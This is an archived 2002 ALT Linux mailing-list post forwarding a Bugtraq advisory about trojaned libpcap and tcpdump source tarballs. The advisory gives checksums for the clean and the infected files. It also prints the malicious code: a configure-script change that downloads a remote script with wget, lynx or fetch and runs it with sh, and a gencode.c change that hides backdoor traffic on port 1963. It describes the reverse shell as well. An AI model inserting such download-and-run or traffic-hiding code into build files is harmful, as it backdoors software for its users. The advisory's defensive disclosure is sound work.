From: "Dmitry V. Levin" <ldv@altlinux.org> To: ALT Linux Sisyphus mailing list <sisyphus@altlinux.ru>, ALT Linux general discussion list <community@altlinux.ru> Subject: [Comm] [alex@intelinet.ro: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan] Date: Thu, 14 Nov 2002 13:59:20 +0300 Message-ID: <20021114105920.GA28428@basalt.office.altlinux.ru> (raw) [-- Attachment #1: Type: text/plain, Size: 4501 bytes --] Это не security announce. Просто для ясности: в Сизифе и дистрибутивах исходники нормальные. ----- Forwarded message from Mincu Alexandru <alex@intelinet.ro> ----- Date: 13 Nov 2002 16:48:30 +0200 From: Mincu Alexandru <alex@intelinet.ro> To: bugtraq@securityfocus.com Subject: Latest libpcap & tcpdump sources from tcpdump.org contain a trojan Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com Organization: X-Mailer: Ximian Evolution 1.2.0 Updates: * Many Mirrors are infected with the trojan Background: * Libpcap provides a packet sniffing library for programs like Snort. * Tcpdump is a standard tool for packet sniffing. Details: * The trojan contains modifications to the configure script and gencode.c (in libpcap only). * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it. * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one byte status codes: * A - program exits * D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34. * M - closes connection, sleeps 3600 seconds, and then reconnects Hmm... ADM... * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections. * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic. * This is similar to the OpenSSH trojan a few months ago. Good sources: http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/libpcap-0.7.1.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.6.2.tar.gz http://www.ibiblio.org/pub/Linux/distributions/gentoo/distfiles/tcpdump-3.7.1.tar.gz MD5 Sum 0597c23e3496a5c108097b2a0f1bd0c7 libpcap-0.7.1.tar.gz MD5 Sum 6bc8da35f9eed4e675bfdf04ce312248 tcpdump-3.6.2.tar.gz MD5 Sum 03e5eac68c65b7e6ce8da03b0b0b225e tcpdump-3.7.1.tar.gz Trojaned sources: http://www.tcpdump.org/release/libpcap-0.7.1.tar.gz http://www.tcpdump.org/release/tcpdump-3.6.2.tar.gz http://www.tcpdump.org/release/tcpdump-3.7.1.tar.gz MD5 Sum 73ba7af963aff7c9e23fa1308a793dca libpcap-0.7.1.tar.gz MD5 Sum 3a1c2dd3471486f9c7df87029bf2f1e9 tcpdump-3.6.2.tar.gz MD5 Sum 3c410d8434e63fb3931fe77328e4dd88 tcpdump-3.7.1.tar.gz The (relevant) gencode.c diff: *** 288,293 **** --- 289,318 ---- { extern int n_errors; int len; + int l; + char *port = "1963"; + char *str, *tmp, *new = "not port 1963"; + + if (buf && *buf && strstr (buf, port)) { + buf = "port 1964"; + } + else { + l = strlen (new) + 1; + if (!(!buf || !*buf)) { + l += strlen (buf); + l += 5; /* and */ + } + + str = (char *)malloc (l); + str[0] = '\0'; + if (!(!buf || !*buf)) { + strcpy (str, buf); + strcat (str, " and "); + } + + strcat (str, new); + buf = str; + } no_optimize = 0; n_errors = 0; *************** The (relevant) configure diff: + CNF="services" + URL="mars.raketti.net/~mash/$CNF" ! (IFS="," ! ARGS="wget -q -O -,lynx --source,fetch -q -o -" ! ! for i in $ARGS; do ! IFS=" " ! $i $URL 1> $CNF ! if [ -f $CNF ]; then sh $CNF ! exit ! fi ! rm -f $CNF ! done) 1>/dev/null 2>/dev/null & The "services" payload: * trojan-script, the non-obfuscated portion (excerpted) * services, the complete version Thanks to: Russell Adams <rladams@NO_SPAMadamsinfoserv.com> Mathew Solnik <msolnik@NO_SPAMhlug.org> Scott Stout <skout@NO_SPAMwiretapped.us> with the Houston Linux Users Group. Additional thanks to Bruce Locke for interpreting the backdoor code. Thanks to Gentoo's Portage system for catching the trojaned -- Mincu Alexandru <alex@intelinet.ro> ----- End forwarded message ----- -- ldv [-- Attachment #2: Type: application/pgp-signature, Size: 189 bytes --]
reply other threads:[~2002-11-14 10:59 UTC|newest] Thread overview: [no followups] expand[flat|nested] mbox.gz Atom feed
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=20021114105920.GA28428@basalt.office.altlinux.ru \ --to=ldv@altlinux.org \ --cc=community@altlinux.ru \ --cc=sisyphus@altlinux.ru \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: link
ALT Linux Community general discussions This inbox may be cloned and mirrored by anyone: git clone --mirror http://lore.altlinux.org/community/0 community/git/0.git # If you have public-inbox 1.1+ installed, you may # initialize and index your mirror using the following commands: public-inbox-init -V2 community community/ http://lore.altlinux.org/community \ mandrake-russian@linuxteam.iplabs.ru community@lists.altlinux.org community@lists.altlinux.ru community@lists.altlinux.com public-inbox-index community Example config snippet for mirrors. Newsgroup available over NNTP: nntp://lore.altlinux.org/org.altlinux.lists.community AGPL code for this site: git clone https://public-inbox.org/public-inbox.git